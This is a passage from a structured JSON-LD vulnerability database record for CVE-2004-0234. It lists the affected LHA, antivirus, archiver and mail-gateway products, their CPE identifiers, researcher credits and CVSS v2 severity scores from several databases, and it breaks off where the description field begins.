    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200408-0140",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "f-secure personal express",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "f secure",
        "version": "4.7"
      },
      {
        "model": "winzip",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "winzip",
        "version": "9.0"
      },
      {
        "model": "cgpmcafee",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "stalker",
        "version": "3.2"
      },
      {
        "model": "propack",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "sgi",
        "version": "3.0"
      },
      {
        "model": "propack",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "sgi",
        "version": "2.4"
      },
      {
        "model": "winrar",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "rarlab",
        "version": "3.20"
      },
      {
        "model": "internet gatekeeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "f secure",
        "version": "6.32"
      },
      {
        "model": "internet gatekeeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "f secure",
        "version": "6.31"
      },
      {
        "model": "f-secure for firewalls",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "f secure",
        "version": "6.20"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.13"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.11"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.10"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.8"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.7"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.6"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.5"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.4"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.3"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.2"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.1"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.0"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "5.52"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "4.60"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "5.42"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "2004"
      },
      {
        "model": "lha",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "1.14i-9"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "2003"
      },
      {
        "model": "f-secure personal express",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "4.5"
      },
      {
        "model": "fedora core",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "core_1.0"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "clearswift",
        "version": "4.3.6_sp1"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "4.52"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "5.5"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "4.51"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "5.41"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "6.21"
      },
      {
        "model": "lha",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tsugio okamoto",
        "version": "1.17"
      },
      {
        "model": "f-secure personal express",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "4.6"
      },
      {
        "model": "f-secure internet security",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "2004"
      },
      {
        "model": "lha",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tsugio okamoto",
        "version": "1.15"
      },
      {
        "model": "f-secure internet security",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "2003"
      },
      {
        "model": "lha",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tsugio okamoto",
        "version": "1.14"
      },
      {
        "model": "lha for unix",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "lha for unix",
        "version": "1.17"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "9"
      },
      {
        "model": "linux advanced workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1"
      },
      {
        "model": "linux i686",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "lha-1.14i-9.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "hat fedora core1",
        "scope": null,
        "trust": 0.3,
        "vendor": "red",
        "version": null
      },
      {
        "model": "s.k. lha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mr",
        "version": "1.17"
      },
      {
        "model": "s.k. lha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mr",
        "version": "1.15"
      },
      {
        "model": "s.k. lha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mr",
        "version": "1.14"
      },
      {
        "model": "webshield smtp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.5"
      },
      {
        "model": "webshield appliances",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "virusscan professional",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "virusscan for netapp",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "virusscan enterprise i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "8.0"
      },
      {
        "model": "virusscan command line",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "8.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.1"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "6.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "5.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.5.1"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.5"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.0.3"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "3.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "2.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "1.0"
      },
      {
        "model": "virex",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "securityshield for microsoft isa server",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "portalshield for microsoft sharepoint",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "netshield for netware",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "managed virusscan",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "linuxshield",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "internet security suite",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "groupshield for mail servers with epo",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "groupshield for lotus domino",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "groupshield for exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "5.5"
      },
      {
        "model": "asap virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "0"
      },
      {
        "model": "active virus defense smb edition",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "active threat protection",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "active mail protection",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "personal express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.7"
      },
      {
        "model": "personal express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.6"
      },
      {
        "model": "personal express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.5"
      },
      {
        "model": "internet security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "2004"
      },
      {
        "model": "internet security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "2003"
      },
      {
        "model": "anti-virus for workstations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.42"
      },
      {
        "model": "anti-virus for workstations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.41"
      },
      {
        "model": "anti-virus for windows servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.42"
      },
      {
        "model": "anti-virus for windows servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.41"
      },
      {
        "model": "anti-virus for samba servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.60"
      },
      {
        "model": "anti-virus for ms exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "6.21"
      },
      {
        "model": "anti-virus for mimesweeper",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.42"
      },
      {
        "model": "anti-virus for mimesweeper",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.41"
      },
      {
        "model": "anti-virus for linux workstations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.52"
      },
      {
        "model": "anti-virus for linux workstations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.51"
      },
      {
        "model": "anti-virus for linux servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.52"
      },
      {
        "model": "anti-virus for linux servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.51"
      },
      {
        "model": "anti-virus for linux gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.52"
      },
      {
        "model": "anti-virus for linux gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.51"
      },
      {
        "model": "anti-virus client security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.52"
      },
      {
        "model": "anti-virus client security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.50"
      },
      {
        "model": "anti-virus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "2004"
      },
      {
        "model": "anti-virus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "2003"
      },
      {
        "model": "mailsweeper sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "clearswift",
        "version": "4.3.6"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.1.18"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.1.17"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.03.022"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "10243"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000169"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0234"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-202"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_workstations:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:workstations:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:mimesweeper:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_internet_security:2003:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_internet_security:2004:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sgi:propack:2.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.6_sp1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_gateways:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:windows_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:workstations:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:stalker:cgpmcafee:3.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:2003:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_workstations:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.60:*:samba_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.5:*:client_security:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.52:*:client_security:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:2004:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_gateways:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:mimesweeper:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:windows_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:6.21:*:ms_exchange:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_for_firewalls:6.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:rarlab:winrar:3.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:lha:1.14i-9:*:i386:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:winzip:winzip:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:fedora_core:core_1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0234"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ulf Harnhammar\u203b ulfh@update.uu.se\u203bJean-S\u00e9bastien Guay-Leroux\u203b jean-sebastien@guay-leroux.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-202"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2004-0234",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": true,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2004-0234",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-8664",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2004-0234",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200408-202",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-8664",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8664"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000169"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0234"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-202"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
